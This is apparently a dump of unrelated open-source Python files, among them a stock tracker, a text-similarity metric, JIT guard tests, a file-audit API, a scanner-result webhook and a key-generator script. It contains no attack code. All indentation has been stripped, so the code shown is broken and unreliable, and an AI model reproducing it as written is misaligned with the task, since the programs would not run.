symbol = symbol.upper()
query = session.query(Stock).filter(Stock.symbol == symbol)
stock = query.one_or_none()
if stock is None:
self._add_stock(session, symbol)
else:
return stock
return query.one_or_none()
def get_stocks(self, session, symbols):
return [self.get_stock(session, s) for s in symbols]
def get_session(self):
return Session()
def update_stocks(self, session, stocks=None):
if not stocks:
stocks = session.query(Stock).all()
try:
return self.get_quotes(session, stocks)
except Exception as e:
logger.error("Error getting quotes: {}".format(e))
session.rollback()
def update_historical(self, session, stock, start_date, end_date):
share = Share(stock.symbol)
try:
data = get_stock_data_historical(share, start_date, end_date)
except YQLResponseMalformedError as e:
logger.error(e)
return None
matching_quotes = session.query(Quote).filter(and_(Quote.stock_id == stock.id,
Quote.date_last_traded >= pd.Timestamp(start_date),
Quote.date_last_traded <= pd.Timestamp(end_date)))\
.order_by(Quote.date_inserted.asc())
dates = [pd.Timestamp(q.date_last_traded).date() for q in matching_quotes.all()
if pd.Timestamp(q.date_last_traded).hour > 13]
quotes = []
for record in data:
try:
if record[Quote.date_last_traded.name].date() not in dates:
quote = Quote(**{k: v
for k, v in record.items()
if k in quote_keys})
quote.symbol_name = stock.symbol_name
quote.stock_exchange = stock.stock_exchange
quote.trade_currency = stock.trade_currency
quotes.append(quote)
stock.quotes.append(quote)
except (KeyError, ValueError) as e:
logger.error("Error parsing historical quote - {} - {}".format(e, record))
[session.add(q) for q in quotes]
return quotes
def update_historicals(self, session, stocks=None, start_date=None, end_date=None):
now = pd.Timestamp(datetime.datetime.now())
if start_date is None:
start_date = now - pd.DateOffset(years=1)
if end_date is None:
end_date = now
return [self.update_historical(session, s, start_date, end_date) for s in stocks]
def get_watchlist(self, session, name):
return session.query(WatchList).filter(WatchList.name == name).one_or_none()
def add_watchlist(self, session, name, tickers=None):
exists = self.get_watchlist(session, name)
if exists is None:
w = WatchList(name=name)
session.add(w)
else:
w = exists
if tickers is not None:
stocks = self.get_stocks(session, tickers)
for s in stocks:
if s in w.stocks:
continue
w.stocks.append(s)
return w
def delete_watchlist(self, session, name):
session.query(WatchList).filter(WatchList.name == name).delete()
def add_watchlist_stocks(self, session, watchlist, tickers):
stocks = self.get_stocks(session, tickers)
for s in stocks:
if s in watchlist.stocks:
continue
watchlist.stocks.append(s)
def delete_watchlist_stocks(self, session, watchlist, tickers):
for stock in watchlist.stocks:
if stock.symbol in tickers:
session.delete(stock)
return watchlist
|
shorttext/metrics/embedfuzzy/jaccard.py | vishalbelsare/PyShortTextCategorization | 481 | 12658413 |
from itertools import product
import numpy as np
from scipy.spatial.distance import cosine
from shorttext.utils import tokenize
def jaccardscore_sents(sent1, sent2, wvmodel, sim_words=lambda vec1, vec2: 1-cosine(vec1, vec2)):
""" Compute the Jaccard score between sentences based on their word similarities.
:param sent1: first sentence
:param sent2: second sentence
:param wvmodel: word-embeding model
:param sim_words: function for calculating the similarities between a pair of word vectors (default: cosine)
:return: soft Jaccard score
:type sent1: str
:type sent2: str
:type wvmodel: gensim.models.keyedvectors.KeyedVectors
:type sim_words: function
:rtype: float
"""
tokens1 = tokenize(sent1)
tokens2 = tokenize(sent2)
tokens1 = list(filter(lambda w: w in wvmodel, tokens1))
tokens2 = list(filter(lambda w: w in wvmodel, tokens2))
allowable1 = [True] * len(tokens1)
allowable2 = [True] * len(tokens2)
simdict = {(i, j): sim_words(wvmodel[tokens1[i]], wvmodel[tokens2[j]])
for i, j in product(range(len(tokens1)), range(len(tokens2)))}
intersection = 0.0
simdictitems = sorted(simdict.items(), key=lambda s: s[1], reverse=True)
for idxtuple, sim in simdictitems:
i, j = idxtuple
if allowable1[i] and allowable2[j]:
intersection += sim
allowable1[i] = False
allowable2[j] = False
union = len(tokens1) + len(tokens2) - intersection
if union > 0:
return intersection / union
elif intersection == 0:
return 1.
else:
return np.inf
|
Chapter12/sample_http_server.py | JTamarit/Tkinter_libro | 173 | 12658422 | from http.server import HTTPServer, BaseHTTPRequestHandler
class TestHandler(BaseHTTPRequestHandler):
def _print_request_data(self):
content_length = self.headers['Content-Length']
print("Content-length: {}".format(content_length))
data = self.rfile.read(int(content_length))
print(data.decode('utf-8'))
def _send_200(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
def do_POST(self, *args, **kwargs):
print('POST request received')
self._print_request_data()
self._send_200()
def do_PUT(self, *args, **kwargs):
print("PUT request received")
self._print_request_data()
self._send_200()
def run(server_class=HTTPServer, handler_class=TestHandler):
server_address = ('', 8000)
httpd = server_class(server_address, handler_class)
httpd.serve_forever()
run()
|
brownie/network/middlewares/geth_poa.py | ActorForth/brownie | 1,595 | 12658431 | from typing import Callable, Dict, List, Optional
from web3 import Web3
from web3.exceptions import ExtraDataLengthError
from web3.middleware import geth_poa_middleware
from brownie.network.middlewares import BrownieMiddlewareABC
class GethPOAMiddleware(BrownieMiddlewareABC):
@classmethod
def get_layer(cls, w3: Web3, network_type: str) -> Optional[int]:
try:
w3.eth.get_block("latest")
return None
except ExtraDataLengthError:
return -1
def process_request(self, make_request: Callable, method: str, params: List) -> Dict:
middleware_fn = geth_poa_middleware(make_request, self.w3)
return middleware_fn(method, params)
|
tests/jit/__init__.py | ldelebec/asteroid | 722 | 12658505 | <reponame>ldelebec/asteroid
import pytest
ignored_warnings = [
"ignore:torch.tensor results are registered as constants in the trace.",
"ignore:Converting a tensor to a Python boolean might cause the trace to be incorrect.",
"ignore:Converting a tensor to a Python float might cause the trace to be incorrect.",
"ignore:Using or importing the ABCs from",
]
pytestmark = pytest.mark.filterwarnings(*ignored_warnings)
|
modelchimp/views/api/experiment_metric.py | samzer/modelchimp-server | 134 | 12658511 | from rest_framework import status, viewsets
from rest_framework.response import Response
from rest_framework import mixins
from modelchimp.models.experiment import Experiment
from modelchimp.api_permissions import HasProjectMembership
from rest_framework.permissions import IsAuthenticated
class ExperimentMetricAPI(mixins.RetrieveModelMixin,
viewsets.GenericViewSet):
queryset = Experiment.objects.all()
permission_classes = (IsAuthenticated, HasProjectMembership)
def retrieve(self, request, model_id, *args, **kwargs):
instance= self.get_queryset().get(id=model_id)
result = dict()
result['summary'] = []
result['metric'] = instance.metrics
result['duration'] = instance.durations
if not result['metric']:
return Response(result, status=status.HTTP_200_OK)
for metric in result['metric']['metric_list']:
# Get the max and min value
metric_max = 0
metric_min = 0
for i,m in enumerate(result['metric']['evaluation'][metric]):
current_value = m['value']
if i == 0:
metric_max = current_value
metric_min = current_value
continue
if current_value > metric_max:
metric_max = current_value
if current_value < metric_min:
metric_min = current_value
metric_dict = dict()
metric_dict['name'] = metric
metric_dict['max'] = metric_max
metric_dict['min'] = metric_min
result['summary'].append(metric_dict)
return Response(result, status=status.HTTP_200_OK)
|
problems/building-h2o/building_h2o.py | jianpingbadao/leetcode | 198 | 12658537 | <filename>problems/building-h2o/building_h2o.py<gh_stars>100-1000
#!/usr/bin/env python
class H2O:
def __init__(self):
pass
def hydrogen(self, releaseHydrogen: 'Callable[[], None]') -> None:
# releaseHydrogen() outputs "H". Do not change or remove this line.
releaseHydrogen()
def oxygen(self, releaseOxygen: 'Callable[[], None]') -> None:
# releaseOxygen() outputs "O". Do not change or remove this line.
releaseOxygen() |
xclim/testing/tests/test_utils.py | ECCC-CCCS/xclim | 169 | 12658539 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Test for utils
from inspect import signature
import numpy as np
import xarray as xr
from xclim.core.indicator import Daily
from xclim.core.utils import (
ensure_chunk_size,
nan_calc_percentiles,
walk_map,
wrapped_partial,
)
def test_walk_map():
d = {"a": -1, "b": {"c": -2}}
o = walk_map(d, lambda x: 0)
assert o["a"] == 0
assert o["b"]["c"] == 0
def test_wrapped_partial():
def func(a, b=1, c=1):
"""Docstring"""
return (a, b, c)
newf = wrapped_partial(func, b=2)
assert list(signature(newf).parameters.keys()) == ["a", "c"]
assert newf(1) == (1, 2, 1)
newf = wrapped_partial(func, suggested=dict(c=2), b=2)
assert list(signature(newf).parameters.keys()) == ["a", "c"]
assert newf(1) == (1, 2, 2)
assert newf.__doc__ == func.__doc__
def func(a, b=1, c=1, **kws):
"""Docstring"""
return (a, b, c)
newf = wrapped_partial(func, suggested=dict(c=2), a=2, b=2)
assert list(signature(newf).parameters.keys()) == ["c", "kws"]
assert newf() == (2, 2, 2)
def test_wrapped_indicator(tas_series):
def indice(
tas: xr.DataArray,
tas2: xr.DataArray = None,
thresh: int = float,
freq: str = "YS",
):
if tas2 is None:
out = tas < thresh
else:
out = tas < tas2
out = out.resample(time="YS").sum()
out.attrs["units"] = "days"
return out
ind1 = Daily(
realm="atmos",
identifier="test_ind1",
units="days",
compute=wrapped_partial(indice, tas2=None),
)
ind2 = Daily(
realm="atmos",
identifier="test_ind2",
units="days",
compute=wrapped_partial(indice, thresh=None),
)
tas = tas_series(np.arange(366), start="2000-01-01")
tas2 = tas_series(1 + np.arange(366), start="2000-01-01")
assert ind2(tas, tas2) == 366
assert ind1(tas, thresh=1111) == 366
def test_ensure_chunk_size():
da = xr.DataArray(np.zeros((20, 21, 20)), dims=("x", "y", "z"))
out = ensure_chunk_size(da, x=10, y=-1)
assert da is out
dac = da.chunk({"x": (1,) * 20, "y": (10, 10, 1), "z": (10, 10)})
out = ensure_chunk_size(dac, x=3, y=5, z=-1)
assert out.chunks[0] == (3, 3, 3, 3, 3, 5)
assert out.chunks[1] == (10, 11)
assert out.chunks[2] == (20,)
class Test_nan_calc_percentiles:
def test_calc_perc_type7(self):
# Exemple array from: https://en.wikipedia.org/wiki/Percentile#The_nearest-rank_method
arr = np.asarray([15.0, 20.0, 35.0, 40.0, 50.0])
res = nan_calc_percentiles(arr, percentiles=[40.0], alpha=1, beta=1)
# The expected is from R `quantile(arr, probs=c(0.4), type=7)`
assert res[()] == 29
def test_calc_perc_type8(self):
# Exemple array from: https://en.wikipedia.org/wiki/Percentile#The_nearest-rank_method
arr = np.asarray(
[[15.0, 20.0, 35.0, 40.0, 50.0], [15.0, 20.0, 35.0, 40.0, 50.0]]
)
res = nan_calc_percentiles(
arr,
percentiles=[40.0],
alpha=1.0 / 3.0,
beta=1.0 / 3.0,
)
# The expected is from R `quantile(arr, probs=c(0.4), type=8)`
assert np.all(res[0][0] == 27)
assert np.all(res[0][1] == 27)
def test_calc_perc_2d(self):
# Exemple array from: https://en.wikipedia.org/wiki/Percentile#The_nearest-rank_method
arr = np.asarray(
[[15.0, 20.0, 35.0, 40.0, 50.0], [15.0, 20.0, 35.0, 40.0, 50.0]]
)
res = nan_calc_percentiles(arr, percentiles=[40.0])
# The expected is from R ` quantile(c(15.0, 20.0, 35.0, 40.0, 50.0), probs=0.4)`
assert np.all(res[0][0] == 29)
assert np.all(res[0][1] == 29)
def test_calc_perc_nan(self):
arr = np.asarray([np.NAN])
res = nan_calc_percentiles(arr, percentiles=[50.0])
assert np.isnan(res)
def test_calc_perc_empty(self):
arr = np.asarray([])
res = nan_calc_percentiles(arr)
assert np.isnan(res)
def test_calc_perc_partial_nan(self):
arr = np.asarray([np.NaN, 41.0, 41.0, 43.0, 43.0])
res = nan_calc_percentiles(arr, percentiles=[50.0], alpha=1 / 3.0, beta=1 / 3.0)
# The expected is from R `quantile(arr, 0.5, type=8, na.rm = TRUE)`
# Note that scipy mquantiles would give a different result here
assert res[()] == 42.0
|
CommonTools/ParticleFlow/python/Isolation/pfIsolatedMuons_cfi.py | ckamtsikis/cmssw | 852 | 12658557 | <filename>CommonTools/ParticleFlow/python/Isolation/pfIsolatedMuons_cfi.py
import FWCore.ParameterSet.Config as cms
pfIsolatedMuons = cms.EDFilter(
"PFCandidateFwdPtrCollectionStringFilter",
src = cms.InputTag("pfMuonsFromVertex"),
cut = cms.string("pt > 5 & muonRef.isAvailable() & "\
"muonRef.pfIsolationR04().sumChargedHadronPt + "\
"muonRef.pfIsolationR04().sumNeutralHadronEt + "\
"muonRef.pfIsolationR04().sumPhotonEt "\
" < 0.15 * pt "
),
makeClones = cms.bool(True)
)
|
pywemo/ouimeaux_device/outdoor_plug.py | sullivanmj/pywemo | 102 | 12658583 | <filename>pywemo/ouimeaux_device/outdoor_plug.py
"""Representation of a WeMo OutdoorPlug device."""
from .switch import Switch
class OutdoorPlug(Switch):
"""Representation of a WeMo Motion device."""
|
rpython/jit/metainterp/optimizeopt/test/test_guard.py | nanjekyejoannah/pypy | 333 | 12658588 | <reponame>nanjekyejoannah/pypy
from rpython.jit.metainterp import compile
from rpython.jit.metainterp.history import Const
from rpython.jit.metainterp.optimizeopt.dependency import (
DependencyGraph, IndexVar)
from rpython.jit.metainterp.optimizeopt.guard import (GuardStrengthenOpt,
Guard)
from rpython.jit.metainterp.optimizeopt.test.test_schedule import SchedulerBaseTest
from rpython.jit.metainterp.optimizeopt.test.test_vecopt import FakeLoopInfo
from rpython.jit.metainterp.resoperation import (rop,
ResOperation, InputArgInt)
class FakeMemoryRef(object):
def __init__(self, array, iv):
self.index_var = iv
self.array = array
def is_adjacent_to(self, other):
if self.array is not other.array:
return False
iv = self.index_var
ov = other.index_var
val = (int(str(ov.var)[1:]) - int(str(iv.var)[1:]))
# i0 and i1 are adjacent
# i1 and i0 ...
# but not i0, i2
# ...
return abs(val) == 1
class FakeOp(object):
def __init__(self, cmpop):
self.boolinverse = ResOperation(cmpop, [box(0), box(0)], None).boolinverse
self.cmpop = cmpop
def getopnum(self):
return self.cmpop
def getarg(self, index):
if index == 0:
return 'lhs'
elif index == 1:
return 'rhs'
else:
assert 0
class FakeResOp(object):
def __init__(self, opnum):
self.opnum = opnum
def getopnum(self):
return self.opnum
def box(value):
return InputArgInt(value)
def const(value):
return Const._new(value)
def iv(value, coeff=(1,1,0)):
var = IndexVar(value)
var.coefficient_mul = coeff[0]
var.coefficient_div = coeff[1]
var.constant = coeff[2]
return var
def guard(opnum):
def guard_impl(cmpop, lhs, rhs):
guard = Guard(0, FakeResOp(opnum), FakeOp(cmpop), {'lhs': lhs, 'rhs': rhs})
return guard
return guard_impl
guard_true = guard(rop.GUARD_TRUE)
guard_false = guard(rop.GUARD_FALSE)
del guard
class TestGuard(SchedulerBaseTest):
def optguards(self, loop, user_code=False):
info = FakeLoopInfo(loop)
info.snapshot(loop)
for op in loop.operations:
if op.is_guard():
op.setdescr(compile.CompileLoopVersionDescr())
dep = DependencyGraph(loop)
opt = GuardStrengthenOpt(dep.index_vars)
opt.propagate_all_forward(info, loop, user_code)
return opt
def assert_guard_count(self, loop, count):
guard = 0
for op in loop.operations + loop.prefix:
if op.is_guard():
guard += 1
if guard != count:
self.debug_print_operations(loop)
assert guard == count
def assert_contains_sequence(self, loop, instr):
class Glob(object):
next = None
prev = None
def __repr__(self):
return '*'
from rpython.jit.tool.oparser import OpParser, default_fail_descr
parser = OpParser(instr, self.cpu, self.namespace, None, default_fail_descr, True, None)
parser.vars = { arg.repr_short(arg._repr_memo) : arg for arg in loop.inputargs}
operations = []
last_glob = None
prev_op = None
for line in instr.splitlines():
line = line.strip()
if line.startswith("#") or \
line == "":
continue
if line.startswith("..."):
last_glob = Glob()
last_glob.prev = prev_op
operations.append(last_glob)
continue
op = parser.parse_next_op(line)
if last_glob is not None:
last_glob.next = op
last_glob = None
operations.append(op)
def check(op, candidate, rename):
m = 0
if isinstance(candidate, Glob):
if candidate.next is None:
return 0 # consumes the rest
if op.getopnum() != candidate.next.getopnum():
return 0
m = 1
candidate = candidate.next
if op.getopnum() == candidate.getopnum():
for i,arg in enumerate(op.getarglist()):
oarg = candidate.getarg(i)
if arg in rename:
assert rename[arg].same_box(oarg)
else:
rename[arg] = oarg
if not op.returns_void():
rename[op] = candidate
m += 1
return m
return 0
j = 0
rename = {}
ops = loop.finaloplist()
for i, op in enumerate(ops):
candidate = operations[j]
j += check(op, candidate, rename)
if isinstance(operations[-1], Glob):
assert j == len(operations)-1, self.debug_print_operations(loop)
else:
assert j == len(operations), self.debug_print_operations(loop)
def test_basic(self):
loop1 = self.parse_trace("""
i10 = int_lt(i1, 42)
guard_true(i10) []
i101 = int_add(i1, 1)
i102 = int_lt(i101, 42)
guard_true(i102) []
""")
opt = self.optguards(loop1)
self.assert_guard_count(loop1, 1)
self.assert_contains_sequence(loop1, """
...
i101 = int_add(i1, 1)
i12 = int_lt(i101, 42)
guard_true(i12) []
...
""")
def test_basic_sub(self):
loop1 = self.parse_trace("""
i10 = int_gt(i1, 42)
guard_true(i10) []
i101 = int_sub(i1, 1)
i12 = int_gt(i101, 42)
guard_true(i12) []
""")
opt = self.optguards(loop1)
self.assert_guard_count(loop1, 1)
self.assert_contains_sequence(loop1, """
...
i101 = int_sub(i1, 1)
i12 = int_gt(i101, 42)
guard_true(i12) []
...
""")
def test_basic_mul(self):
loop1 = self.parse_trace("""
i10 = int_mul(i1, 4)
i20 = int_lt(i10, 42)
guard_true(i20) []
i12 = int_add(i10, 1)
i13 = int_lt(i12, 42)
guard_true(i13) []
""")
opt = self.optguards(loop1)
self.assert_guard_count(loop1, 1)
self.assert_contains_sequence(loop1, """
...
i101 = int_mul(i1, 4)
i12 = int_add(i101, 1)
i13 = int_lt(i12, 42)
guard_true(i13) []
...
""")
def test_compare(self):
key = box(1)
incomparable = (False, 0)
# const const
assert iv(const(42)).compare(iv(const(42))) == (True, 0)
assert iv(const(-400)).compare(iv(const(-200))) == (True, -200)
assert iv(const(0)).compare(iv(const(-1))) == (True, 1)
# var const
assert iv(key, coeff=(1,1,0)).compare(iv(const(42))) == incomparable
assert iv(key, coeff=(5,70,500)).compare(iv(const(500))) == incomparable
# var var
assert iv(key, coeff=(1,1,0)).compare(iv(key,coeff=(1,1,0))) == (True, 0)
assert iv(key, coeff=(1,7,0)).compare(iv(key,coeff=(1,7,0))) == (True, 0)
assert iv(key, coeff=(4,7,0)).compare(iv(key,coeff=(3,7,0))) == incomparable
assert iv(key, coeff=(14,7,0)).compare(iv(key,coeff=(2,1,0))) == (True, 0)
assert iv(key, coeff=(14,7,33)).compare(iv(key,coeff=(2,1,0))) == (True, 33)
assert iv(key, coeff=(15,5,33)).compare(iv(key,coeff=(3,1,33))) == (True, 0)
def test_imply_basic(self):
key = box(1)
# if x < 42 <=> x < 42
g1 = guard_true(rop.INT_LT, iv(key, coeff=(1,1,0)), iv(const(42)))
g2 = guard_true(rop.INT_LT, iv(key, coeff=(1,1,0)), iv(const(42)))
assert g1.implies(g2)
assert g2.implies(g1)
# if x+1 < 42 => x < 42
g1 = guard_true(rop.INT_LT, iv(key, coeff=(1,1,1)), iv(const(42)))
g2 = guard_true(rop.INT_LT, iv(key, coeff=(1,1,0)), iv(const(42)))
assert g1.implies(g2)
assert not g2.implies(g1)
# if x+2 < 42 => x < 39
# counter: 39+2 < 42 => 39 < 39
g1 = guard_true(rop.INT_LT, iv(key, coeff=(1,1,2)), iv(const(42)))
g2 = guard_true(rop.INT_LT, iv(key, coeff=(1,1,0)), iv(const(39)))
assert not g1.implies(g2)
assert not g2.implies(g1)
# if x+2 <= 42 => x <= 43
g1 = guard_true(rop.INT_LE, iv(key, coeff=(1,1,2)), iv(const(42)))
g2 = guard_true(rop.INT_LE, iv(key, coeff=(1,1,0)), iv(const(43)))
assert g1.implies(g2)
assert not g2.implies(g1)
# if x*13/3+1 <= 0 => x*13/3 <= -1
# is true, but the implies method is not smart enough
g1 = guard_true(rop.INT_LE, iv(key, coeff=(13,3,1)), iv(const(0)))
g2 = guard_true(rop.INT_LE, iv(key, coeff=(13,3,0)), iv(const(-1)))
assert not g1.implies(g2)
assert not g2.implies(g1)
# > or >=
# if x > -55 => x*2 > -44
# counter: -44 > -55 (True) => -88 > -44 (False)
g1 = guard_true(rop.INT_GT, iv(key, coeff=(1,1,0)), iv(const(-55)))
g2 = guard_true(rop.INT_GT, iv(key, coeff=(2,1,0)), iv(const(-44)))
assert not g1.implies(g2)
assert not g2.implies(g1)
# if x*2/2 > -44 => x*2/2 > -55
g1 = guard_true(rop.INT_GE, iv(key, coeff=(2,2,0)), iv(const(-44)))
g2 = guard_true(rop.INT_GE, iv(key, coeff=(2,2,0)), iv(const(-55)))
assert g1.implies(g2)
assert not g2.implies(g1)
def test_imply_coeff(self):
key = box(1)
key2 = box(2)
# if x > y * 9/3 => x > y
# counter: x = -2, y = -1, -2 > -3 => -2 > -1, True => False
g1 = guard_true(rop.INT_GT, iv(key, coeff=(1,1,0)), iv(box(1),coeff=(9,3,0)))
g2 = guard_true(rop.INT_GT, iv(key, coeff=(1,1,0)), iv(box(1),coeff=(1,1,0)))
assert not g1.implies(g2)
assert not g2.implies(g1)
# if x > y * 15/5 <=> x > y * 3
g1 = guard_true(rop.INT_GT, iv(key, coeff=(1,1,0)), iv(key2,coeff=(15,5,0)))
g2 = guard_true(rop.INT_GT, iv(key, coeff=(1,1,0)), iv(key2,coeff=(3,1,0)))
assert g1.implies(g2)
assert g2.implies(g1)
# x >= y => x*3-5 >= y
# counter: 1 >= 0 => 1*3-5 >= 0 == -2 >= 0, True => False
g1 = guard_true(rop.INT_GE, iv(key, coeff=(1,1,0)), iv(key2))
g2 = guard_true(rop.INT_GE, iv(key, coeff=(3,1,-5)), iv(key2))
assert not g1.implies(g2)
assert not g2.implies(g1)
# guard false inverst >= to <
# x < y => x*3-5 < y
# counter: 3 < 4 => 3*3-5 < 4 == 4 < 4, True => False
g1 = guard_false(rop.INT_GE, iv(key, coeff=(1,1,0)), iv(key2))
g2 = guard_false(rop.INT_GE, iv(key, coeff=(3,1,-5)), iv(key2))
assert not g1.implies(g2)
assert not g2.implies(g1)
# x <= y => x*3-5 > y
# counter: 3 < 4 => 3*3-5 < 4 == 4 < 4, True => False
g1 = guard_false(rop.INT_GT, iv(key, coeff=(1,1,0)), iv(key2))
g2 = guard_true(rop.INT_GT, iv(key, coeff=(3,1,-5)), iv(key2))
assert not g1.implies(g2)
assert not g2.implies(g1)
def test_collapse(self):
loop1 = self.parse_trace("""
i10 = int_gt(i1, 42)
guard_true(i10) []
i11 = int_add(i1, 1)
i12 = int_gt(i11, i2)
guard_true(i12) []
""")
opt = self.optguards(loop1, True)
self.assert_guard_count(loop1, 2)
self.assert_contains_sequence(loop1, """
...
i100 = int_ge(42, i2)
guard_true(i100) []
...
i40 = int_gt(i1, 42)
guard_true(i40) []
...
""")
|
tests/components/nina/__init__.py | MrDelik/core | 30,023 | 12658609 | """Tests for the Nina integration."""
import json
from typing import Any
from tests.common import load_fixture
def mocked_request_function(url: str) -> dict[str, Any]:
"""Mock of the request function."""
dummy_response: dict[str, Any] = json.loads(
load_fixture("sample_warnings.json", "nina")
)
dummy_response_details: dict[str, Any] = json.loads(
load_fixture("sample_warning_details.json", "nina")
)
if url == "https://warnung.bund.de/api31/dashboard/083350000000.json":
return dummy_response
warning_id = url.replace("https://warnung.bund.de/api31/warnings/", "").replace(
".json", ""
)
return dummy_response_details[warning_id]
|
chapter8_PyTorch项目实战/text_classification/model.py | Tisword/pytorch-in-action | 164 | 12658629 | <reponame>Tisword/pytorch-in-action
import torch
import torch.nn as nn
import torch.nn.functional as F
class CNN_Text(nn.Module):
def __init__(self, args):
super(CNN_Text, self).__init__()
self.args = args
embed_num = args.embed_num
embed_dim = args.embed_dim
class_num = args.class_num
Ci = 1
kernel_num = args.kernel_num
kernel_sizes = args.kernel_sizes
self.embed = nn.Embedding(embed_num, embed_dim)
self.convs_list = nn.ModuleList(
[nn.Conv2d(Ci, kernel_num, (kernel_size, embed_dim)) for kernel_size in kernel_sizes])
self.dropout = nn.Dropout(args.dropout)
self.fc = nn.Linear(len(kernel_sizes) * kernel_num, class_num)
def forward(self, x):
x = self.embed(x)
x = x.unsqueeze(1)
x = [F.relu(conv(x)).squeeze(3) for conv in self.convs_list]
x = [F.max_pool1d(i, i.size(2)).squeeze(2) for i in x]
x = torch.cat(x, 1)
x = self.dropout(x)
x = x.view(x.size(0), -1)
logit = self.fc(x)
return logit
|
webhook/views/views.py | nobgr/xray | 7,086 | 12658636 | import datetime
from datetime import datetime
from executor.executor import dispatch_web_vuln, dispatch_service_vuln, dispatch_statistics
from model.vuln import Statistics, WebVuln, WebParam, WebParamPosition, WebRequest, WebResponse, ServiceVuln
def process_web_vuln(instance, data):
"""将 web 漏洞 json 转换为相关 model"""
detail = data["detail"]
p = detail["param"]
if p:
param = WebParam(key=p["key"], value=p["value"], position=WebParamPosition(p["position"]))
else:
param = None
request = []
response = []
extra = {}
for i in range(0, 10):
req_key = f"request{i}" if i else "request"
resp_key = f"response{i}" if i else "response"
req = detail.get(req_key)
resp = detail.get(resp_key)
if req == "" or resp == "":
continue
if req is None or resp is None:
break
request.append(WebRequest(raw=req))
response.append(WebResponse(raw=resp))
# 其他的数据可能是自定义的,就单独拿出来
not_extra_key = ["request", "response", "param", "payload", "url"]
for k, v in detail.items():
for item in not_extra_key:
if item in k:
break
else:
extra[k] = v
vuln = WebVuln(create_time=datetime.fromtimestamp(data["create_time"] / 1000), plugin=data["plugin"],
vuln_class=data["vuln_class"],
url=data["target"]["url"], param=param, request=request, response=response, extra=extra,
raw_json=data)
dispatch_web_vuln(instance, vuln)
def process_statistics(instance, data):
"""将统计数据 json 转换为相关 json"""
s = Statistics(num_found_urls=data["num_found_urls"],
num_scanned_urls=data["num_scanned_urls"],
num_sent_http_requests=data["num_sent_http_requests"],
average_response_time=data["average_response_time"],
ratio_failed_http_requests=data["ratio_failed_http_requests"],
ratio_progress=data["ratio_progress"],
raw_json=data)
dispatch_statistics(instance, s)
def process_host_vuln(instance, data):
"""将服务漏洞 json 转换为相关 json"""
detail = data["detail"]
extra = {}
not_extra_key = ["host", "port"]
for k, v in detail.items():
for item in not_extra_key:
if item in k:
break
else:
extra[k] = v
vuln = ServiceVuln(create_time=datetime.fromtimestamp(data["create_time"] / 1000), plugin=data["plugin"],
vuln_class=data["vuln_class"], host=detail["host"], port=detail["port"],
extra=extra, raw_json=data)
dispatch_service_vuln(instance, vuln)
|
seahub/api2/endpoints/admin/file_audit.py | MJochim/seahub | 420 | 12658665 | # Copyright (c) 2012-2016 Seafile Ltd.
import logging
from rest_framework.authentication import SessionAuthentication
from rest_framework.permissions import IsAdminUser
from rest_framework.response import Response
from rest_framework.views import APIView
from rest_framework import status
from seaserv import seafile_api
from seahub.api2.endpoints.utils import check_time_period_valid, \
get_log_events_by_type_and_time
from seahub.api2.authentication import TokenAuthentication
from seahub.api2.throttling import UserRateThrottle
from seahub.api2.permissions import IsProVersion
from seahub.api2.utils import api_error
from seahub.api2.endpoints.utils import get_user_name_dict, \
get_user_contact_email_dict
from seahub.utils.timeutils import datetime_to_isoformat_timestr
logger = logging.getLogger(__name__)
class FileAudit(APIView):
authentication_classes = (TokenAuthentication, SessionAuthentication)
permission_classes = (IsAdminUser, IsProVersion)
throttle_classes = (UserRateThrottle,)
def get(self, request):
# check the date format, should be like '2015-10-10'
start = request.GET.get('start', None)
end = request.GET.get('end', None)
if not check_time_period_valid(start, end):
error_msg = 'start or end date invalid.'
return api_error(status.HTTP_400_BAD_REQUEST, error_msg)
try:
events = get_log_events_by_type_and_time('file_audit', start, end)
except Exception as e:
logger.error(e)
error_msg = 'Internal Server Error'
return api_error(status.HTTP_500_INTERNAL_SERVER_ERROR, error_msg)
result = []
if events:
# get name/contact_email dict for events user/repo_owner
ev_user_list = []
ev_repo_owner_list = []
for ev in events:
repo_id = ev.repo_id
repo = seafile_api.get_repo(repo_id)
if repo:
ev.repo_name = repo.name
ev.repo_owner = seafile_api.get_repo_owner(repo_id) or \
seafile_api.get_org_repo_owner(repo_id)
else:
ev.repo_name = ''
ev.repo_owner = ''
ev_user_list.append(ev.user)
ev_repo_owner_list.append(ev.repo_owner)
ev_user_name_dict = get_user_name_dict(ev_user_list)
ev_user_contact_email_dict = get_user_contact_email_dict(ev_user_list)
ev_repo_owner_name_dict = get_user_name_dict(ev_repo_owner_list)
ev_repo_owner_contact_email_dict = get_user_contact_email_dict(ev_repo_owner_list)
for ev in events:
result.append({
'repo_id': ev.repo_id,
'repo_name': ev.repo_name,
'repo_owner_email': ev.repo_owner,
'repo_owner_name': ev_repo_owner_name_dict[ev.repo_owner],
'repo_owner_contact_email': ev_repo_owner_contact_email_dict[ev.repo_owner],
'time': datetime_to_isoformat_timestr(ev.timestamp),
'ip': ev.ip,
'file_path': ev.file_path,
'etype': ev.etype,
'user_email': ev.user,
'user_name': ev_user_name_dict[ev.user],
'user_contact_email': ev_user_contact_email_dict[ev.user],
})
return Response(result)
|
sample.py | vzkqwvku/kglab | 388 | 12658669 | <filename>sample.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import kglab
# create a KnowledgeGraph object
kg = kglab.KnowledgeGraph()
# load RDF from a URL
kg.load_rdf("https://storage.googleapis.com/kglab-tutorial/foaf.rdf", format="xml")
# measure the graph
measure = kglab.Measure()
measure.measure_graph(kg)
print("edges: {}\n".format(measure.get_edge_count()))
print("nodes: {}\n".format(measure.get_node_count()))
# serialize as a string in "Turtle" TTL format
ttl = kg.save_rdf_text()
print("```")
print(ttl[:999])
print("```")
|
packages/pyright-internal/src/tests/samples/genericTypes29.py | sasano8/pyright | 241 | 12658670 | <gh_stars>100-1000
# This sample tests bidirectional inference when the
# type derives from the expected type and both are
# generic.
from typing import Mapping, Optional, Union
v0: Optional[Mapping[str, Union[int, str]]] = dict([("test1", 1), ("test2", 2)])
v1: Optional[Mapping[str, float]] = dict([("test1", 1), ("test2", 2)])
# This should generate an error because of a type mismatch.
v2: Mapping[str, str] = dict([("test1", 1), ("test2", 2)])
|
bin/keygen.py | 641i130/keygen | 114 | 12658701 | #!/usr/bin/env python3
import argparse
import os
import string
import sys
import subprocess
parser = argparse.ArgumentParser(description='Generates keys.', epilog='All remaining arguments are passed to OpenSCAD.')
parser.add_argument("filename",
help="OpenSCAD source file for the key")
parser.add_argument("-b", "--bitting", dest='bitting',
help="Key bitting")
